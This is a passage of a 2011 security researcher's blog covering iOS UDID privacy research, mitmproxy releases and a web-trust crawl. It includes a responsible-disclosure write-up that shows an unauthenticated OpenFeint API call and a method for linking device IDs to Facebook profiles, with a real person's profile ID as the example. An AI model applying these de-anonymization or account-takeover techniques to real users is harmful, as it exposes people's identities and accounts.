explanation of the exploit</a>.</li> <li>Halvar Flake's <a rel="external" href="http://www.immunityinc.com/infiltrate/2011/presentations/Fundamentals_of_exploitation_revisited.pdf">Programming and state machines</a>, which is where I first saw the term "programming the weird machine".</li> </ul> Neighborhoods of trust on the web 2011-09-27T00:00:00+00:00 2011-09-27T00:00:00+00:00 https://corte.si/posts/privacy/neighbourhoods-of-trust/ <p>For the last fortnight I've been hard at work on a new project that aims to examine trust and security on the web at scale. The basic idea is to use a browser instance to render a URL, and then to extract all persistent state with browser forensic techniques afterwards. This gives you a dump of cookies, cache contents, Flash storage, HTML5 databases, and so on. At the same time, all traffic is routed through a specialised version of <a rel="external" href="http://mitmproxy.org">mitmproxy</a>, and captured for later analysis. The result is a very detailed snapshot of what viewing a given URL actually <em>does</em>. The next step is to do this "at scale" - this means running many instances of this process in parallel on headless servers, decoupling things using queues, backing it all onto a database, and then spending days and days fine-tuning. I'm happy with my progress so far - my infrastructure is now now scanning all the URLs passing through <a rel="external" href="http://news.ycombinator.com">Hacker News</a>, <a rel="external" href="http://reddit.com">Reddit</a>, <a rel="external" href="http://digg.com">Digg</a>, <a rel="external" href="http://delicious.com">Delicious</a> and <a rel="external" href="http://pinboard.in">Pinboard</a> in realtime, without breaking a sweat.</p> <p>I am pretty excited about the possibilities for this project, and I'm exploring plans for the future with like-minded security folk. Get in touch if this interests you, and keep an eye on my blog for more news.</p> <p>After my pilot run, I had 150 gigs of data covering about 120 thousand URLs. Below is a quick peek at one tiny slice of this data - an appetizer for things to come.</p> <h2 id="neighborhoods-of-trust">Neighborhoods of trust</h2> <div class="media"> <a href="full.png"> <img src="wholegraph.png" /> </a> </div> <p>This graph shows structures that emerge from the way sites use third-party executable resources. In this context, "executable" means means JavaScript, Flash and HTML, and "third-party" means domains other than the URL's own. The nodes in this graph are the third-party domains, and the edges are associations between them via the URLs I crawled. For example, if a site loaded scripts from both Google Analytics and from Doubleclick, that would create (or reinforce) an edge between the nodes "google-analytics.com" and "doubleclick.com". Using this data, I calculated a co-occurrence coefficient for the third-party sources, and then extracted the resulting neighbourhood structures <a rel="external" href="http://lanl.arxiv.org/abs/0803.0476">algorithmically</a>. The neighbourhood information was used to colour and lay out the graph, trying to keep nodes that are closely correlated together. Finally, nodes are scaled based on how many URLs reference them.</p> <p>The result is a rather stunning graph showing neighborhoods of trust - areas of the Internet bound together based on the third parties allowed to run code in users' browsers. I've spent a few hours playing with this data, and the sheer range of interesting structure is surprising. At one end of the spectrum, you can zoom in to the individual node relationships, and find small clusters of surprising sites that cross-load resources from each other, often because they are owned by the same entity. At the other end, countries, language groups, and broad fields of interest aggregate in huge tribes of kinship.</p> <p>Here are a few of the larger-scale features from the graph.</p> <h3 id="mainstream">Mainstream</h3> <div class="media"> <a href="wholegraph-b.png"> <img src="wholegraph-b.png" /> </a> </div> <p>The most widely used resources dominate in the neighbourhood extraction algorithm, which causes them to cluster together in their own super-community. The top nodes in this cluster, descending order of occurrence are: google-analytics.com, facebook.com, doubleclick.net, fbcdn.net, quantserve.com, twitter.com, google.com, googlesyndication.com, googleapis.com, scorecardresearch.net, facebook.net, addthis.com. These are also the top nodes overall.</p> <h3 id="japanese">Japanese</h3> <div class="media"> <a href="wholegraph-a.png"> <img src="wholegraph-a.png" /> </a> </div> <p>The main resources are hatena.ne.jp, microad.jp, mixi.jp, yahoo.co.jp, nakanohito.jp. More surprisingly, also in this cluster are topsy.com, appspot.com and postrank.com. Perhaps these resources are especially commonly used on Japanese sites.</p> <h3 id="russian">Russian</h3> <div class="media"> <a href="wholegraph-d.png"> <img src="wholegraph-d.png" /> </a> </div> <p>Top resources are yadro.ru, yandex.ru, rambler.ru, vkontakte.ru, openstat.net, userapi.com, shinystat.net, and dt00.net</p> <h3 id="porn">Porn</h3> <div class="media"> <a href="wholegraph-c.png"> <img src="wholegraph-c.png" /> </a> </div> <p>And here we have a portion of the web dedicated to porn. The top resources are awempire.com, clickbank.net, picadmedia.com, getresponse.com, adultfriendfinder.com, adultadword.com, phcdn.com, juicyads.com, brazzers.com, etology.com, data-ero-advertising.com and viddler.com. A more surprising inclusion in this group is wufoo.com - I wonder if this is an artifact, or whether Wufoo really does have a use in the adult content world.</p> <h3 id="misc">Misc</h3> <div class="media"> <a href="wholegraph-e.png"> <img src="wholegraph-e.png" /> </a> </div> <p>Just to show that it's not all clear-cut, here's an example of a neighbourhood I find harder to explain. The top resources are netdna-cdn.com, amgdgt.com, trafficmp.com, ooyala.com, suitesmart.com, demdex.net, adfrontiers.com, lycos.com and break.com. I speculate that this group might be loosely aligned around a number of big CDNs and analysis suites.</p> <h2 id="tech">Tech</h2> <p>The graph in this post was created, analyzed and pre-processed using <a rel="external" href="http://projects.skewed.de/graph-tool/">graph-tool</a>, a great Python library for dealing with large graphs. The visualization and modularity analysis was done using the ever-wonderful <a rel="external" href="http://gephi.org/">Gephi</a>. If these aren't both in your arsenal of analysis tools, you're missing out.</p> Why the Apple UDID had to die 2011-09-09T00:00:00+00:00 2011-09-09T00:00:00+00:00 https://corte.si/posts/security/udid-must-die/ <p><strong>EDIT: A <a rel="external" href="http://blogs.wsj.com/digits/2011/09/19/privacy-risk-found-on-cellphone-games/">WSJ Digits article</a> is now up, containing a responses from Zynga and Chillingo. Other networks declined to comment.</strong></p> <p>A UDID is a "Unique Device Identifier" - you can think of it as a serial number burned permanently into every iPhone, iPad and iPod Touch. Any installed app can access the UDID without requiring the user's knowledge or consent. We know that UDIDs are very widely used - in a sample of 94 apps I tested, <a href="https://corte.si/posts/security/apple-udid-survey/">74% silently sent the UDID to one or more servers on the Internet</a>, often without encryption. This means that UDIDs are not secret values - if you use an Apple device regularly, it's certain that your UDID has found its way into scores of databases you're entirely unaware of. Developers often assume UDIDs are anonymous values, and routinely use them to aggregate detailed and sensitive user behavioural information. One example is Flurry, a mobile analytics firm used by 15% of apps I tested, which can monitor application startup, shutdown, scores achieved, and a host of other application-specific events, all linked to the user's UDID. I recently showed that it was possible to use <a rel="external" href="http://en.wikipedia.org/wiki/OpenFeint">OpenFeint</a>, a large mobile social gaming network, to <a href="https://corte.si/posts/security/openfeint-udid-deanonymization/">de-anonymize UDIDs</a>, linking them to usernames, email addresses, GPS locations, and even Facebook profiles.</p> <p>This post looks at the way UDIDs are used in the broader social gaming ecosystem. The work is based on a simple question: what happens if we swap our UDID for another while communicating with the network? There are a number of ways to do this - in my case I used <a rel="external" href="http://mitmproxy.org">mitmproxy</a>, an intercepting HTTP/S proxy I developed which lets me re-write the traffic leaving a device on the fly. In most cases this was a simple matter of replacing one string with another, but two networks (Scoreloop and Crystal) prevented UDID substitution using cryptography. Unfortunately, both networks relied on the secrecy of key material distributed in the application binaries to every device. I have verified that it is possible to reverse engineer the application binaries to extract the key material and circumvent the cryptographic protection.</p> <p>The outcome of this experiment shows that social gaming networks systematically misuse UDIDs, resulting in serious privacy breaches for their users. All the networks I tested allowed UDIDs to be linked to potentially identifying user information, ranging from usernames to email addresses, friends lists and private messages. Furthermore, 5 of the 7 networks allow an attacker to log in as a user using only their UDID, giving the attacker complete control of the user's account. Two networks had further problems that compromised a user's Facebook and Twitter accounts - Crystal lets an attacker take control of a user accounts by leaking API keys, while Scoreloop partially discloses users' friends lists, even if they are private.</p> <style> .yes { background-color: #d55858; color: #000000; } .no { background-color: #5bd65b; color: #000000; } </style> <table> <tr> <th></th> <th>Data leaked</th> <th>Login as user</th> <th>Social Media Accounts</th> </tr> <tr> <th><a href="http://www.chillingo.com/">Crystal</a></th> <td class="yes"> Username, friends, Facebook, Twitter, games played, location, email address </td> <td class="yes"> Yes </td> <td class="yes"> Control of Facebook, Twitter accounts</td> </tr> <tr> <th><a href="http://www.gameloft.com/">GameLoft</a></th> <td class="yes"> Username, email address, games played, nationality, friends </td> <td class="yes"> Yes </td> <td class="no"> No </td> </tr> <tr> <th><a href="http://www.geocade.com/">Geocade</a></th> <td class="yes"> Username, email address, games played, location </td> <td class="yes"> Yes </td> <td class="no"> No </td> </tr> <tr> <th><a href="http://openfeint.com/">OpenFeint</a></th> <td class="yes"> Username, last played game, online status, friends </td> <td class="yes"> Yes </td> <td class="no"> No </td> </tr> <tr> <th><a href="http://www.scoreloop.com/">Scoreloop</a></th> <td class="yes"> Email address, gender, username, nationality, friends </td> <td class="yes"> Yes </td> <td class="yes"> Access private Facebook and Twitter friends lists </td> </tr> <tr> <th><a href="http://plusplus.com/">Plus+</a></th> <td class="yes"> Username </td> <td class="no"> No </td> <td class="no"> No </td> </tr> <tr> <th><a href="http://www.zynga.com/">Zynga</a></th> <td class="yes"> First name, username, friends*, in-game messages*, mobile number*</td> <td class="yes"> Yes* </td> <td class="no"> No </td> </tr> </table> <p>* The starred Zynga findings rely on the fact that other networks can be used to obtain the user's email address using the UDID.</p> <p>There are two caveats to keep in mind while considering these results. First, the findings are based on the default settings for each social network - some networks may have settings that reduce the amount of information exposed. Second, some of the data leaked is optional - for instance, it's not mandatory for a user to link Facebook or Twitter accounts with any of the networks.</p> <p>All the affected companies and Apple were notified 5 weeks ago. The Crystal and Scoreloop teams have both repaired the problems that could lead to a follow-on compromise of a user's social network accounts. At the time of writing, it is still possible to log in as a user using only a UDID on five of the vulnerable networks.</p> <h2 id="the-future">The future</h2> <p>A few days after I notified the companies involved, it was revealed that Apple was <a rel="external" href="http://techcrunch.com/2011/08/19/apple-ios-5-phasing-out-udid/">quietly killing the UDID API</a>. It will still be present in IOS5, but is marked deprecated, and will probably be removed in future. I recommend that developers shift away from using UDIDs now, rather than wait for formal removal of the API.</p> <p>We can now expect a frenzy of activity as developers look for alternatives. The challenge will be to make sure that the cure isn't as bad as the disease - Apple's recommendation to "create a unique identifier specific to your app" could tempt developers to replicate the UDID mechanism on a smaller scale, flaws and all. Expect more blog posts on this topic soon.</p> mitmproxy 0.6 2011-08-07T00:00:00+00:00 2011-08-07T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/announce0_6/ <div class="media"> <a href="..&#x2F;mitmproxy_0_4.png"> <img src="..&#x2F;mitmproxy_0_4.png" /> </a> </div> <p>I'm happy to announce the release of mitmproxy 0.6, featuring a redesigned scripting API, slew of major new features and a panoply of small bugfixes and improvements.</p> <h2 id="changelog">Changelog</h2> <ul> <li>New scripting API that allows much more flexible and fine-grained rewriting of traffic. See the docs for more info.</li> <li>Support for gzip and deflate content encodings. A new "z" keybinding in mitmproxy to let us quickly encode and decode content, plus automatic decoding for the "pretty" view mode.</li> <li>An event log, viewable with the "v" shortcut in mitmproxy, and the "-e" commandline argument in both mitmproxy and mitmdump.</li> <li>Huge performance improvements both in the mitmproxy interface, and loading large numbers of flows from file.</li> <li>A new "replace" convenience method for all flow objects, that does a universal regex-based string replacement.</li> <li>Header management has been rewritten to maintain both case and order.</li> <li>Improved stability for SSL interception.</li> <li>Default expiry time on generated SSL certs has been dropped to avoid an OpenSSL overflow bug that caused certificates to expire in the distant past on some systems.</li> <li>A "pretty" view mode for JSON and form submission data.</li> <li>Expanded documentation and examples.</li> <li>Many other small improvements and bugfixes.</li> </ul> mitmproxy 0.5 2011-06-27T00:00:00+00:00 2011-06-27T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/announce0_5/ <div class="media"> <a href="..&#x2F;mitmproxy_0_4.png"> <img src="..&#x2F;mitmproxy_0_4.png" /> </a> </div> <p>I've just tagged and released mitmproxy 0.5. Everyone should update - this release squelches a few annoying performance killers. You can download it from the project website:</p> <h2 id="mitmproxy-org"><a rel="external" href="http://mitmproxy.org">mitmproxy.org</a></h2> <h2 id="changelog">Changelog</h2> <ul> <li>An -n option to start the tools without binding to a proxy port.</li> <li>Allow scripts, hooks, sticky cookies etc. to run on flows loaded from save files.</li> <li>Regularize command-line options for mitmproxy and mitmdump.</li> <li>Add an "SSL exception" to mitmproxy's license to remove possible distribution issues.</li> <li>Add a --cert-wait-time option to make mitmproxy pause after a new SSL certificate is generated. This can pave over small discrepancies in system time between the client and server.</li> <li>Handle viewing big request and response bodies more elegantly. Only render the first 100k of large documents, and try to avoid running the XML indenter on non-XML data.</li> <li><strong>BUGFIX</strong>: Make the "revert" keyboard shortcut in mitmproxy work after a flow has been replayed.</li> <li><strong>BUGFIX</strong>: Repair a problem that sometimes caused SSL connections to consume 100% of CPU.</li> </ul> UDID media roundup 2011-06-10T00:00:00+00:00 2011-06-10T00:00:00+00:00 https://corte.si/posts/security/udid-media-roundup/ <p>After a hectic month, I'm finally able to return to the UDID privacy issues I covered in my last few blog posts. I plan to publish some further results soon, but first, a quick roundup of the media coverage of the <a href="https://corte.si/posts/security/openfeint-udid-deanonymization/">OpenFeint UDID de-anonymization result</a>.</p> <ul> <li><a rel="external" href="http://blogs.wsj.com/digits/2011/05/11/the-privacy-risks-of-id-codes-in-your-apps/">A post on on the Wall Street Journal tech blog</a> by <a rel="external" href="http://www.jennifervalentinodevries.com/">Jennifer Valentino-DeVries</a>, one of the very few journalists who do good, novel investigative work into issues like UDID privacy.</li> <li>An interview with <a rel="external" href="http://www.repubblica.it/tecnologia/2011/06/03/news/identificativo_iphone-17073898/">La Repubblica</a>, a major Italian daily.</li> <li>An article in <a rel="external" href="http://www.spiegel.de/netzwelt/gadgets/0,1518,761735,00.html">Der Spiegel</a>.</li> <li>Coverage on <a rel="external" href="http://articles.cnn.com/2011-05-09/tech/identity.iphones.ipads_1_apps-identifier-privacy?_s=PM:TECH">CNN online</a>, <a rel="external" href="http://www.wired.com/gadgetlab/2011/05/iphone-udid/">Wired Gadgetlab</a> and the <a rel="external" href="http://www.huffingtonpost.com/2011/05/10/iphone-udid-personal-information-identity_n_860139.html">Huffington Post</a>.</li> <li>And, last but not least, a <a rel="external" href="http://netsecpodcast.com/?p=772">nice 30-minute interview</a> with <a rel="external" href="https://twitter.com/#!/quine">Zach Lanier</a> from the <a rel="external" href="http://netsecpodcast.com/">Network Security Podcast</a>. This is your opportunity to get some more details on the OpenFeint issue and find out what a a weird accent I have.</li> </ul> <p>The issue was also mentioned on many, many blogs and smaller publications.</p> How UDIDs are used: a survey 2011-05-19T00:00:00+00:00 2011-05-19T00:00:00+00:00 https://corte.si/posts/security/apple-udid-survey/ <p>I recently published some <a href="https://corte.si/posts/security/openfeint-udid-deanonymization/">research</a> showing that the OpenFeint social gaming network can be used to link Apple UDIDs to users' real-world identities. To understand why this is a problem, we have to look at the way UDIDs are used in the broader app ecosystem. Once we do this, we see that the vast majority of applications send UDIDs to servers on the Internet, and that UDID-linked user information is aggregated in literally thousands of databases on the net. In this context, UDID de-anonymization is a serious threat to user privacy.</p> <p>We have one good research paper surveying UDID use - in 2010, Eric Smith <a rel="external" href="http://www.pskl.us/wp/?p=476">looked at the unencrypted portion of app traffic</a>, and found that 68% of tested apps send UDIDs upstream in the clear. I was curious to see what the figures would look like if encrypted (HTTPS) traffic was included, so I decided to do my own survey, using <a rel="external" href="http://mitmproxy.org">mitmproxy</a> to analyse all traffic from the 94 applications I had installed on my iPhone. Below is a set of graphs highlighting the main facts. I've also published a list of all applications and the domains they contacted <a href="https://corte.si/posts/security/apple-udid-survey/appdomains.html">here</a> - it makes for interesting reading.</p> <h2 id="apps-are-noisier-than-you-think-they-are">Apps are noisier than you think they are</h2> <div class="media"> <a href="all_domains.png"> <img src="all_domains.png" /> </a> </div> <p>84% of apps tested contacted one or more domains during use. At the extreme end, <a rel="external" href="http://itunes.apple.com/us/app/idestroy-wicked-sick-stress/id309689677?mt=8">iDestroy</a> contacted 14 domains, including 3 different ad networks and OpenFeint.</p> <h2 id="and-send-your-udid-to-more-places-than-you-expect">... and send your UDID to more places than you expect</h2> <div class="media"> <a href="udid_domains.png"> <img src="udid_domains.png" /> </a> </div> <p>74% of apps tested sent the device UDID to one or more domains.</p> <h2 id="often-without-encryption">... often without encryption</h2> <div class="media"> <a href="udid_scheme.png"> <img src="udid_scheme.png" /> </a> </div> <p>46% of apps that transmitted UDIDs did so in the clear. 54% of apps transmitting UDIDs used encryption for all UDID traffic<sup class="footnote-reference"><a href="#1">1</a></sup>.</p> <h2 id="a-few-big-udid-aggregators-dominate">A few big UDID aggregators dominate</h2> <div class="media"> <a href="topdomains.png"> <img src="topdomains.png" /> </a> </div> <p>Three big aggregators of UDID-related data dominate: <a rel="external" href="http://apple.com">Apple</a>, <a rel="external" href="http://www.flurry.com">Flurry</a>, and <a rel="external" href="http://www.openfeint.com">OpenFeint</a>. Each one of these companies has the vast majority of UDIDs on file, linked to a rich set of privacy-sensitive information. OpenFeint's ubiquity is one of the reasons why UDID de-anonymization using their API is so serious.</p> <h2 id="behind-them-are-a-long-tail-of-smaller-aggregators">... behind them are a long tail of smaller aggregators</h2> <p>Here is a list of all the remaining domains that had UDIDs transmitted to them - a mixture of ad networks, analytics firms, individual developer sites, and online services.</p> <table> <tr> <td> ads.mp.mydas.mobi </td> <td> analytics.localytics.com </td> <td> api.dropbox.com </td> </tr> <tr> <td> bayobongo.com </td> <td> bbc.112.2o7.net </td> <td> beatwave.collect3.com.au </td> </tr> <tr> <td> catalog.lexcycle.com </td> <td> data.mobclix.com </td> <td> init.gc.apple.com </td> </tr> <tr> <td> msh.amazon.com </td> <td> notifications.lexcycle.com </td> <td> promo.limbic.com </td> </tr> <tr> <td> soma.smaato.com </td> <td> www.chimerasw.com </td> <td> www.phasiclabs.com </td> </tr> <tr> <td> www.trainyard.ca </td> <td> api.twitter.com </td> <td> ngpipes.ngmoco.com </td> </tr> <tr> <td> npr.122.2o7.net </td> <td> ws.tapjoyads.com </td> <td> </td> </tr> </table> <h2 id="methodology">Methodology</h2> <p>For each application, I started a logging instance of mitmdump, like so:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">mitmdump</span><span style="color: #005CC5;"> -w</span><span style="color: #032F62;"> appname</span></span></code></pre> <p>I then started up the application, interacted with anything that might elicit network traffic, and shut it down. The collected data was analyzed with a simple script, that used the <a rel="external" href="http://mitmproxy.org/doc/library.html">libmproxy</a> API to traverse the traffic dumps and extract the needed information.</p> <div class="footnote-definition" id="1"><sup class="footnote-definition-label">1</sup> <p>The fact that 54% of UDID-using apps would have gone undetected by Smith's study seems to indicate that there should be a much greater difference between our results - Smith found 68% of apps use UDIDs vs my 74%. The discrepancy can be accounted for by the fact that we used different samples - Smith used predominantly applications in Apple's "Top Free" lists, whereas I used both paid and unpaid applications that happened to be on my phone.</p> </div> De-anonymizing Apple UDIDs with OpenFeint 2011-05-04T00:00:00+00:00 2011-05-04T00:00:00+00:00 https://corte.si/posts/security/openfeint-udid-deanonymization/ <p>Every iPhone, iPad and iPod touch has an associated Unique Device Identifier (UDID). You can think of the UDID as a serial number burned into the device - one that can't be removed or changed<sup class="footnote-reference"><a href="#1">1</a></sup>. This number is exposed to app developers through an API, without requiring the device owner's permission or knowledge.</p> <p>Few Apple users realise just how widely their UDIDs are used. <a rel="external" href="http://www.pskl.us/wp/?p=476">Research shows</a> that 68% of apps silently send UDIDs to servers on the Internet. This is often accompanied by information on how, when and where the device is used. The most common destination for traffic containing a user's UDID is Apple itself, followed by the <a rel="external" href="http://www.flurry.com/">Flurry</a> mobile analytics network and OpenFeint, a mobile social gaming company. These companies are uber-aggregators of UDID-linked user information, because so many apps use their APIs. Trailing behind the big three are thousands of individual developer sites, ad servers and smaller analytics firms. Users have no way to stop their device from offering up their UDID, telling who their data is being sent to, or even telling that it's happening at all. This situation has caused wide-spread concern, including coverage in the <a rel="external" href="http://blogs.wsj.com/digits/2010/12/19/unique-phone-id-numbers-explained/">Wall Street Journal</a>, and <a rel="external" href="http://www.txinjuryblog.com/tags/udid-lawsuit/">two</a> <a rel="external" href="http://www.infosecurity-us.com/view/15643/apple-faces-second-lawsuit-over-udid-disclosure-to-third-parties/">lawsuits</a> aimed at Apple.</p> <p>The saving grace is that your device UDID is not linked to your real-world identity. If it were possible to de-anonymize UDIDs, the result would be a serious privacy breach. Apple is well aware of this, and <a rel="external" href="http://developer.apple.com/library/ios/#documentation/uikit/reference/UIDevice_Class/Reference/UIDevice.html">explicitly tells developers that they are not permitted to publicly link a UDID to a user account</a>.</p> <p>I recently published a tool called <a rel="external" href="http://mitmproxy.org">mitmproxy</a>, a man-in-the-middle proxy that allows one to intercept and monitor SSL-encrypted HTTP traffic. Using mitmproxy to view the encrypted traffic sent by my own iOS devices, I was able to observe protocols and data flows that have clearly received very little external review. A slew of interesting security results followed (keep an eye on this blog), but by far the most alarming was the fact that it was possible to use OpenFeint to completely de-anonymize a large proportion of UDIDs.</p> <h2 id="de-anonymizing-udids-with-openfeint">De-anonymizing UDIDs with OpenFeint</h2> <h3 id="linking-udids-to-openfeint-user-accounts">Linking UDIDs to OpenFeint user accounts</h3> <p>When an OpenFeint-enabled app is first fired up, it submits the device's UDID to OpenFeint's servers, which then return a list of associated accounts:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>https://api.openfeint.com/users/for_device.xml?udid=XXX</span></span></code></pre> <p>This is a completely unauthenticated call - you can try it out by cutting and pasting it into your browser, replacing XXX with <a rel="external" href="http://support.apple.com/kb/HT4061">your own UDID</a>. Here's an example of the response for my UDID, with sensitive information removed:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="xml"><span class="giallo-l"><span>&lt;?</span><span style="color: #22863A;">xml</span><span style="color: #6F42C1;"> version</span><span>=</span><span style="color: #032F62;">&quot;1.0&quot;</span><span style="color: #6F42C1;"> encoding</span><span>=</span><span style="color: #032F62;">&quot;UTF-8&quot;</span><span>?&gt;</span></span> <span class="giallo-l"><span>&lt;</span><span style="color: #22863A;">resources</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">user</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">chat_enabled</span><span>&gt;true&lt;/</span><span style="color: #22863A;">chat_enabled</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">gamer_score</span><span>&gt;XXX&lt;/</span><span style="color: #22863A;">gamer_score</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">id</span><span>&gt;XXX&lt;/</span><span style="color: #22863A;">id</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">last_played_game_id</span><span>&gt;187402&lt;/</span><span style="color: #22863A;">last_played_game_id</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">last_played_game_name</span><span>&gt;tiny wings&lt;/</span><span style="color: #22863A;">last_played_game_name</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">lat</span><span>&gt;XXX&lt;/</span><span style="color: #22863A;">lat</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">lng</span><span>&gt;XXX&lt;/</span><span style="color: #22863A;">lng</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">online</span><span>&gt;false&lt;/</span><span style="color: #22863A;">online</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">profile_picture_source</span><span>&gt;FbconnectCredential&lt;/</span><span style="color: #22863A;">profile_picture_source</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">profile_picture_updated_at</span><span>&gt;XXX&lt;/</span><span style="color: #22863A;">profile_picture_updated_at</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">profile_picture_url</span><span>&gt;http://XXX&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">uploaded_profile_picture_content_type</span><span style="color: #6F42C1;"> nil</span><span>=</span><span style="color: #032F62;">&quot;true&quot;</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;/</span><span style="color: #22863A;">uploaded_profile_picture_content_type</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">uploaded_profile_picture_file_name</span><span style="color: #6F42C1;"> nil</span><span>=</span><span style="color: #032F62;">&quot;true&quot;</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;/</span><span style="color: #22863A;">uploaded_profile_picture_file_name</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">uploaded_profile_picture_file_size</span><span style="color: #6F42C1;"> nil</span><span>=</span><span style="color: #032F62;">&quot;true&quot;</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;/</span><span style="color: #22863A;">uploaded_profile_picture_file_size</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">uploaded_profile_picture_updated_at</span><span style="color: #6F42C1;"> nil</span><span>=</span><span style="color: #032F62;">&quot;true&quot;</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;/</span><span style="color: #22863A;">uploaded_profile_picture_updated_at</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">name</span><span>&gt;XXX&lt;/</span><span style="color: #22863A;">name</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;/</span><span style="color: #22863A;">user</span><span>&gt;</span></span> <span class="giallo-l"><span>&lt;/</span><span style="color: #22863A;">resources</span><span>&gt;</span></span></code></pre> <p>Included is my latitude and longitude, the last game I played, my chosen account name, and my Facebook profile picture URL.</p> <h2 id="linking-udids-to-gps-co-ordinates">Linking UDIDs to GPS co-ordinates</h2> <p>If the user has opted to allow OpenFeint to use their location, latitude and longitude is returned in the profile results. This lets us trivially associate a UDID with GPS co-ordinates.</p> <p><em>The location leak was fixed by OpenFeint after my report. Although some portions of the OpenFeint API still returns a user location, it seems that it is no longer served for direct profile requests.</em></p> <h2 id="linking-udids-to-facebook-profiles">Linking UDIDs to Facebook profiles</h2> <p>If the user registered a Facebook account with OpenFeint, a profile picture URL hosted by the Facebook CDN was returned in the user's profile data. Facebook profile picture URLs include the user's Facebook ID, directly linking it to their Facebook account.</p> <p>For example, here's Bruce Schneier's Facebook profile picture URL:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>http://profile.ak.fbcdn.net/hprofile-ak-snc4/41795_60615378024_8092_n.jpg</span></span></code></pre> <p>The 11-digit number in this URL is his Facebook user ID. We can now view his profile using a URL like this:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>http://www.facebook.com/profile.php?id=60615378024</span></span></code></pre> <p>This final step represents a complete de-anonymization of the UDID, directly linking the supposedly anonymous identifier with a user's real-world identity.</p> <p><em>The Facebook ID leak was fixed by OpenFeint after my report.</em></p> <h2 id="openfeint-s-response">OpenFeint's response</h2> <p>I reported this problem to OpenFeint on 5th of April. I did not hear back from them immediately, but I knew they were working on the problem because their API stopped returning GPS coordinates and Facebook profile picture URLs. On the 12th, I received an email from Jason Citron, OpenFeint's CEO, who wanted to set up a phone conversation with me, him and an OpenFeint legal representative. We spoke on the evening of the 20th of April. I recapped my findings and expressed concern that their API still linked UDIDs to user accounts. They thanked me for the vulnerability report, confirmed that they had tightened their API in response to it, and asked for more time to consider the issue before I released anything. The following morning, it was announced that OpenFeint had been <a rel="external" href="http://openfeint.com/company/press/33-GREE-Puts-Over-100-Million-into-OpenFeint-to-Drive-Global-Expansion-with-100M-users">bought by GREE for $104 million</a>.</p> <p>Last week I received what I assume is OpenFeint's last word on the matter, in the form of an email from Jason Citron: "We will continue to pay attention to the issues you raised and will continue to adjust our practices as necessary." At the time of writing, OpenFeint's API still allows you to associate a UDID with a private user information.</p> <h2 id="impact">Impact</h2> <p>Testing with a small corpus of UDIDs gathered from my own and friends' devices, I was able to link roughly 30% of UDIDs to GPS co-ordinates, 20% of users to a weak identity (e.g. OpenFeint profile picture, user-chosen account name), and 10% of UDIDs directly to a Facebook profile. I stress that my sample was small and probably unrepresentative - only OpenFeint knows what the real numbers are. None the less, we can make a broad guess at the magnitude of the problem, based on the fact that OpenFeint <a rel="external" href="http://openfeint.com/company/press/33-GREE-Puts-Over-100-Million-into-OpenFeint-to-Drive-Global-Expansion-with-100M-users">claims to have 75 million users</a>:</p> <ul> <li>This would mean that about 7.5 million users may have had Facebook accounts linked publicly to their UDIDs until OpenFeint stopped returning profile picture URLs a few weeks ago.</li> <li>About 22.5 million users may have had GPS co-ordinates linked publicly to their UDIDs until the issue was corrected.</li> <li>About 15 million users may still have identifying information like profile pictures and user-chosen account names (that can often be used to identify users) exposed.</li> <li>All 75 million users still have personal details like the last OpenFeint-enabled game they played and whether they are online (i.e. logged in to the OpenFeint network) exposed.</li> </ul> <p>Although the Facebook and GPS de-anonymization issues have been repaired, we have to consider the possibility that these vulnerabilities have already been used to de-anonymize a database of UDIDs.</p> <h2 id="conclusion">Conclusion</h2> <p>I want to stress that the problem here is not primarily with OpenFeint. By designing an API to expose UDIDs and encouraging developers to use it, Apple has ensured that there are literally thousands of databases linking UDIDs to sensitive user information on the net. A leak from any one of these - or worse a large-scale de-anonymization like the OpenFeint one - inevitably has serious consequences for user privacy.</p> <div class="footnote-definition" id="1"><sup class="footnote-definition-label">1</sup> <p>I should note that this is not quite accurate. The UDID is actually a computed value - a hash calculated over a set of identifying hardware attributes. In a sense, it only really exists as an API call.</p> </div> mitmproxy: A 30-second client playback example 2011-03-31T00:00:00+00:00 2011-03-31T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/tute-30-seconds/ <p><a href="https://corte.si/posts/code/mitmproxy/announce0_4/">Yesterday</a> I published version 0.4 of <a rel="external" href="http://mitmproxy.org">mitmproxy</a> - an intercepting proxy for HTTP/S traffic. The tool already has pretty complete documentation, but I've decided to write a series of less formal tutorials to showcase its abilities. Below is the first, and simplest, of these - 